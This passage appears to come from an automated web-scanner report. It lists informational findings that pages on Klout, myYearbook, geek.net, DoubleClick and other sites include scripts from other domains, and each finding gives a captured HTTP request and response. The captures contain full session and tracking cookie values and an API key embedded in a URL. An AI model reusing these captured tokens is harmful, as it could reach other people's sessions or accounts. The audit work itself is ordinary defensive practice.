Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56134fc99bed15f2fd5a80818ad795283fd8c129697d9e64225945a634518a599f407fbb43ecf4a658b9ddf1a7db104c0d63b0746cfa03aaae1ab863abc117bdbb02d3db71de68697ce8ebe3b140cc694f4b6b9ac4bf3e11f81dffb4fbe1533cd73f68e028d22f98ab3055e53149c2adff152894de28de8dcf45425320dd945ad7c826560b357796ca6dc6d533ba78ba27924bdfc3a27ae4551253c31a845794d816ada889934d5f388625fc9e08a450fa5909e6636d6f9b6142468d27d5d3cc846223b4e70019c67a324da173d7e2040d7a91ae12b06d845ee0ecfc1a68b; __qca=P0-2053982506-1311432752930; __utma=261428178.226286795.1311432753.1311432753.1311432753.1; __utmb=261428178.2.10.1311432753; __utmc=261428178; __utmz=261428178.1311432753.1.1.utmcsr=klout.com|utmccn=(referral)|utmcmd=referral|utmcct=/home; WRUID=0; _chartbeat2=t4l7yjjkeowrdz3v

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:52:36 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.5
X-Pingback: /blog/xmlrpc.php
Link: <http://wp.me/Wp0a>; rel=shortlink
Vary: Accept-Encoding
Content-Length: 52776
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head>
<me
...[SNIP]...
<meta name="generator" content="WordPress 2.9.2" />
<script type="text/javascript" charset="utf-8" src="http://w.sharethis.com/button/sharethis.js#publisher=0a0cbf82-2e2f-4a84-853b-ee984cc1e4f2&type=wordpress&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine&wp=2.9.2"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...


<script src="http://stats.wordpress.com/e-201129.js" type="text/javascript"></script>
...[SNIP]...

19.25. http://corp.klout.com/careers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corp.klout.com
Path:	/careers

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js
http://edge.quantserve.com/quant.js

Request

GET /careers HTTP/1.1
Host: corp.klout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56134fc99bed15f2fd5a80818ad795283fd8c129697d9e64225945a634518a599f407fbb43ecf4a658b9ddf1a7db104c0d63b0746cfa03aaae1ab863abc117bdbb02d3db71de68697ce8ebe3b140cc694f4b6b9ac4bf3e11f81dffb4fbe1533cd73f68e028d22f98ab3055e53149c2adff152894de28de8dcf45425320dd945ad7c826560b357796ca6dc6d533ba78ba27924bdfc3a27ae4551253c31a845794d816ada889934d5f388625fc9e08a450fa5909e6636d6f9b6142468d27d5d3cc846223b4e70019c67a324da173d7e2040d7a91ae12b06d845ee0ecfc1a68b; __qca=P0-2053982506-1311432752930; __utma=261428178.226286795.1311432753.1311432753.1311432753.1; __utmb=261428178.2.10.1311432753; __utmc=261428178; __utmz=261428178.1311432753.1.1.utmcsr=klout.com|utmccn=(referral)|utmcmd=referral|utmcct=/home; WRUID=0; _chartbeat2=t4l7yjjkeowrdz3v

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:52:40 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Vary: Accept-Encoding
Content-Length: 9917
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The Standard for
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.26. http://corp.klout.com/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corp.klout.com
Path:	/contact

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js
http://edge.quantserve.com/quant.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:53:16 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Vary: Accept-Encoding
Content-Length: 10024
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Klout</t
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.27. http://corp.klout.com/kscore previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corp.klout.com
Path:	/kscore

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js
http://edge.quantserve.com/quant.js

Request

GET /kscore HTTP/1.1
Host: corp.klout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56134fc99bed15f2fd5a80818ad795283fd8c129697d9e64225945a634518a599f407fbb43ecf4a658b9ddf1a7db104c0d63b0746cfa03aaae1ab863abc117bdbb02d3db71de68697ce8ebe3b140cc694f4b6b9ac4bf3e11f81dffb4fbe1533cd73f68e028d22f98ab3055e53149c2adff152894de28de8dcf45425320dd945ad7c826560b357796ca6dc6d533ba78ba27924bdfc3a27ae4551253c31a845794d816ada889934d5f388625fc9e08a450fa5909e6636d6f9b6142468d27d5d3cc846223b4e70019c67a324da173d7e2040d7a91ae12b06d845ee0ecfc1a68b; __utma=261428178.226286795.1311432753.1311432753.1311432753.1; __utmb=261428178.1.10.1311432753; __utmc=261428178; __utmz=261428178.1311432753.1.1.utmcsr=klout.com|utmccn=(referral)|utmcmd=referral|utmcct=/home; __qca=P0-2053982506-1311432752930; WRUID=0

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:52:31 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Vary: Accept-Encoding
Content-Length: 12034
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Understanding th
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.28. http://corp.klout.com/perks previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corp.klout.com
Path:	/perks

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js
http://edge.quantserve.com/quant.js

Request

GET /perks HTTP/1.1
Host: corp.klout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56134fc99bed15f2fd5a80818ad795283fd8c129697d9e64225945a634518a599f407fbb43ecf4a658b9ddf1a7db104c0d63b0746cfa03aaae1ab863abc117bdbb02d3db71de68697ce8ebe3b140cc694f4b6b9ac4bf3e11f81dffb4fbe1533cd73f68e028d22f98ab3055e53149c2adff152894de28de8dcf45425320dd945ad7c826560b357796ca6dc6d533ba78ba27924bdfc3a27ae4551253c31a845794d816ada889934d5f388625fc9e08a450fa5909e6636d6f9b6142468d27d5d3cc846223b4e70019c67a324da173d7e2040d7a91ae12b06d845ee0ecfc1a68b; __qca=P0-2053982506-1311432752930; __unam=c3eadea-131577bf952-48e618ce-1; __utma=41932592.1896073895.1311432768.1311432768.1311432768.1; __utmb=41932592.1.10.1311432768; __utmc=41932592; __utmz=41932592.1311432768.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=t4l7yjjkeowrdz3v; __utma=261428178.226286795.1311432753.1311432753.1311432753.1; __utmb=261428178.7.10.1311432753; __utmc=261428178; __utmz=261428178.1311432753.1.1.utmcsr=klout.com|utmccn=(referral)|utmcmd=referral|utmcct=/home; WRUID=0

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:53:15 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Vary: Accept-Encoding
Content-Length: 7725
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Klout Perks</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.29. http://corp.klout.com/press previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corp.klout.com
Path:	/press

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js
http://edge.quantserve.com/quant.js

Request

GET /press HTTP/1.1
Host: corp.klout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56134fc99bed15f2fd5a80818ad795283fd8c129697d9e64225945a634518a599f407fbb43ecf4a658b9ddf1a7db104c0d63b0746cfa03aaae1ab863abc117bdbb02d3db71de68697ce8ebe3b140cc694f4b6b9ac4bf3e11f81dffb4fbe1533cd73f68e028d22f98ab3055e53149c2adff152894de28de8dcf45425320dd945ad7c826560b357796ca6dc6d533ba78ba27924bdfc3a27ae4551253c31a845794d816ada889934d5f388625fc9e08a450fa5909e6636d6f9b6142468d27d5d3cc846223b4e70019c67a324da173d7e2040d7a91ae12b06d845ee0ecfc1a68b; __qca=P0-2053982506-1311432752930; __utma=261428178.226286795.1311432753.1311432753.1311432753.1; __utmb=261428178.2.10.1311432753; __utmc=261428178; __utmz=261428178.1311432753.1.1.utmcsr=klout.com|utmccn=(referral)|utmcmd=referral|utmcct=/home; WRUID=0

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:52:35 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Vary: Accept-Encoding
Content-Length: 18321
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Klout in the New
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.30. http://corp.klout.com/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corp.klout.com
Path:	/privacy

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js
http://edge.quantserve.com/quant.js

Request

GET /privacy HTTP/1.1
Host: corp.klout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56134fc99bed15f2fd5a80818ad795283fd8c129697d9e64225945a634518a599f407fbb43ecf4a658b9ddf1a7db104c0d63b0746cfa03aaae1ab863abc117bdbb02d3db71de68697ce8ebe3b140cc694f4b6b9ac4bf3e11f81dffb4fbe1533cd73f68e028d22f98ab3055e53149c2adff152894de28de8dcf45425320dd945ad7c826560b357796ca6dc6d533ba78ba27924bdfc3a27ae4551253c31a845794d816ada889934d5f388625fc9e08a450fa5909e6636d6f9b6142468d27d5d3cc846223b4e70019c67a324da173d7e2040d7a91ae12b06d845ee0ecfc1a68b; __qca=P0-2053982506-1311432752930; __unam=c3eadea-131577bf952-48e618ce-1; WRUID=0; __utma=41932592.1896073895.1311432768.1311432768.1311432768.1; __utmb=41932592.1.10.1311432768; __utmc=41932592; __utmz=41932592.1311432768.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=t4l7yjjkeowrdz3v; __utma=261428178.226286795.1311432753.1311432753.1311432753.1; __utmb=261428178.6.10.1311432753; __utmc=261428178; __utmz=261428178.1311432753.1.1.utmcsr=klout.com|utmccn=(referral)|utmcmd=referral|utmcct=/home

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:53:13 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Vary: Accept-Encoding
Content-Length: 14695
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Klout Privacy Po
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.31. http://corp.klout.com/terms previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corp.klout.com
Path:	/terms

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js
http://edge.quantserve.com/quant.js

Request

GET /terms HTTP/1.1
Host: corp.klout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56134fc99bed15f2fd5a80818ad795283fd8c129697d9e64225945a634518a599f407fbb43ecf4a658b9ddf1a7db104c0d63b0746cfa03aaae1ab863abc117bdbb02d3db71de68697ce8ebe3b140cc694f4b6b9ac4bf3e11f81dffb4fbe1533cd73f68e028d22f98ab3055e53149c2adff152894de28de8dcf45425320dd945ad7c826560b357796ca6dc6d533ba78ba27924bdfc3a27ae4551253c31a845794d816ada889934d5f388625fc9e08a450fa5909e6636d6f9b6142468d27d5d3cc846223b4e70019c67a324da173d7e2040d7a91ae12b06d845ee0ecfc1a68b; __qca=P0-2053982506-1311432752930; __unam=c3eadea-131577bf952-48e618ce-1; WRUID=0; __utma=41932592.1896073895.1311432768.1311432768.1311432768.1; __utmb=41932592.1.10.1311432768; __utmc=41932592; __utmz=41932592.1311432768.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=t4l7yjjkeowrdz3v; __utma=261428178.226286795.1311432753.1311432753.1311432753.1; __utmb=261428178.6.10.1311432753; __utmc=261428178; __utmz=261428178.1311432753.1.1.utmcsr=klout.com|utmccn=(referral)|utmcmd=referral|utmcct=/home

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:53:11 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Vary: Accept-Encoding
Content-Length: 15663
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Klout Terms of U
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.32. http://games.myyearbook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://games.myyearbook.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://assets.mybcdna.com/JavaScript/apps/Games/Games.js?68769
http://assets.mybcdna.com/JavaScript/apps/Games/GamesPortal.js?68769
http://assets.mybcdna.com/JavaScript/apps/IM/IM.js?68769
http://assets.mybcdna.com/JavaScript/apps/Navbar.js?68769
http://assets.mybcdna.com/JavaScript/apps/SuggestionBox.js?68769
http://assets.mybcdna.com/JavaScript/apps/VIP/VIPGift.js?68769
http://assets.mybcdna.com/JavaScript/apps/facebookLikeButtonTracking.js?68769
http://assets.mybcdna.com/JavaScript/apps/jQuery-1.2.6/Plugins/myYearbook.ColorPicker/myYearbook.ColorPicker.js?68769
http://assets.mybcdna.com/JavaScript/apps/jQuery-1.2.6/Plugins/myYearbook.DragonDrop/myYearbook.DragonDrop.js?68769
http://assets.mybcdna.com/JavaScript/apps/jQuery-1.2.6/jQuery-1.2.6.js?68769
http://assets.mybcdna.com/JavaScript/apps/site.js?68769
http://assets.mybcdna.com/JavaScript/apps/swfobject/swfobject.js?68769
http://cdn.adnxs.com/googleintegration.js
http://partner.googleadservices.com/gampad/google_service.js

Request

Response

19.33. http://games.myyearbook.com/landing/pool previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://games.myyearbook.com
Path:	/landing/pool

Issue detail

The response dynamically includes the following scripts from other domains:

http://assets.mybcdna.com/JavaScript/apps/Games/Games.js?68769
http://assets.mybcdna.com/JavaScript/apps/Games/GamesLanding.js?68769
http://assets.mybcdna.com/JavaScript/apps/IM/IM.js?68769
http://assets.mybcdna.com/JavaScript/apps/Navbar.js?68769
http://assets.mybcdna.com/JavaScript/apps/SuggestionBox.js?68769
http://assets.mybcdna.com/JavaScript/apps/VIP/VIPGift.js?68769
http://assets.mybcdna.com/JavaScript/apps/facebookLikeButtonTracking.js?68769
http://assets.mybcdna.com/JavaScript/apps/jQuery-1.2.6/Plugins/myYearbook.ColorPicker/myYearbook.ColorPicker.js?68769
http://assets.mybcdna.com/JavaScript/apps/jQuery-1.2.6/Plugins/myYearbook.DragonDrop/myYearbook.DragonDrop.js?68769
http://assets.mybcdna.com/JavaScript/apps/jQuery-1.2.6/jQuery-1.2.6.js?68769
http://assets.mybcdna.com/JavaScript/apps/site.js?68769
http://assets.mybcdna.com/JavaScript/apps/swfobject/swfobject.js?68769
http://cdn.adnxs.com/googleintegration.js
http://partner.googleadservices.com/gampad/google_service.js

Request

Response

19.34. http://geek.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://geek.net
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi?key=ABQIAAAAWXuvtRynWVXwBKlC6oxaVxRGqX-or9Ce5uyfKfyJhIczwGQabxRSlk-32p1d3V0x5xS_tdLgxQ-a6A

Request

GET / HTTP/1.1
Host: geek.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://hoytllc-vcloud.svn.sourceforge.net/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Expires: Sat, 23 Jul 2011 04:51:06 GMT
Cache-Control: public, max-age=600
Last-Modified: Mon, 03 Jan 2011 19:06:00 UTC
Content-Type: text/html; charset=UTF-8
Content-Length: 11954
Date: Sat, 23 Jul 2011 04:42:49 GMT
X-Varnish: 818876079 818876068
Age: 102
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<p>
<script src="http://www.google.com/jsapi?key=ABQIAAAAWXuvtRynWVXwBKlC6oxaVxRGqX-or9Ce5uyfKfyJhIczwGQabxRSlk-32p1d3V0x5xS_tdLgxQ-a6A" type="text/javascript"></script>
...[SNIP]...

19.35. http://go.ionearth.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://go.ionearth.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js

Request

GET / HTTP/1.1
Host: go.ionearth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6.5
X-Drupal-Cache: HIT
Etag: "1310933824-1"
Cache-Control: public, max-age=0
Last-Modified: Sun, 17 Jul 2011 20:17:04 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 19614
Date: Fri, 22 Jul 2011 21:11:19 GMT
X-Varnish: 10824645
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!doctype html>


<!--[if IE 9 ]><html lang="en" class="no-js ie9"><![endif]--
...[SNIP]...
<div>
<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js" type="text/javascript"></script>
...[SNIP]...

19.36. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/js/r20110713/r20110719/abg.js

Request

Response

19.37. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/sma8.js

Request

GET /pagead/ads?client=ca-pub-7268992780839433&output=html&h=600&slotname=0018455936&w=160&ea=0&flash=0&url=http%3A%2F%2Fwww.lifescript.com%2FHealth%2FConditions%2FADD%2FHow_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&dt=1311276184871&bpp=26&shv=r20110713&jsv=r20110719&correlator=1311276187095&frm=7&adk=399869954&ga_vid=274049985.1311276131&ga_sid=1311276131&ga_hid=171534027&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=1023&bih=706&ifk=1021502957&eid=36815002&fu=4&ifi=1&dtd=4848 HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=2;sz=160x600;ord=101352252258050
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

19.38. http://home.live.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.live.com
Path:	/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.wlxrs.com/4zz1a0sDfk8F0baNdznX2A/Search.js
http://js.wlxrs.com/IW9RMFusiP7aP7lsSm5H9w/wlive.js
http://js.wlxrs.com/MDkCGfAXrMQjb2SY98x7WQ/comscore/beacon.js
http://js.wlxrs.com/MVZ9IMxspbQFL8KYd3mZeg/SearchBox.js
http://js.wlxrs.com/_D/IW9RMFusiP7aP7lsSm5H9w/jquery-min.js
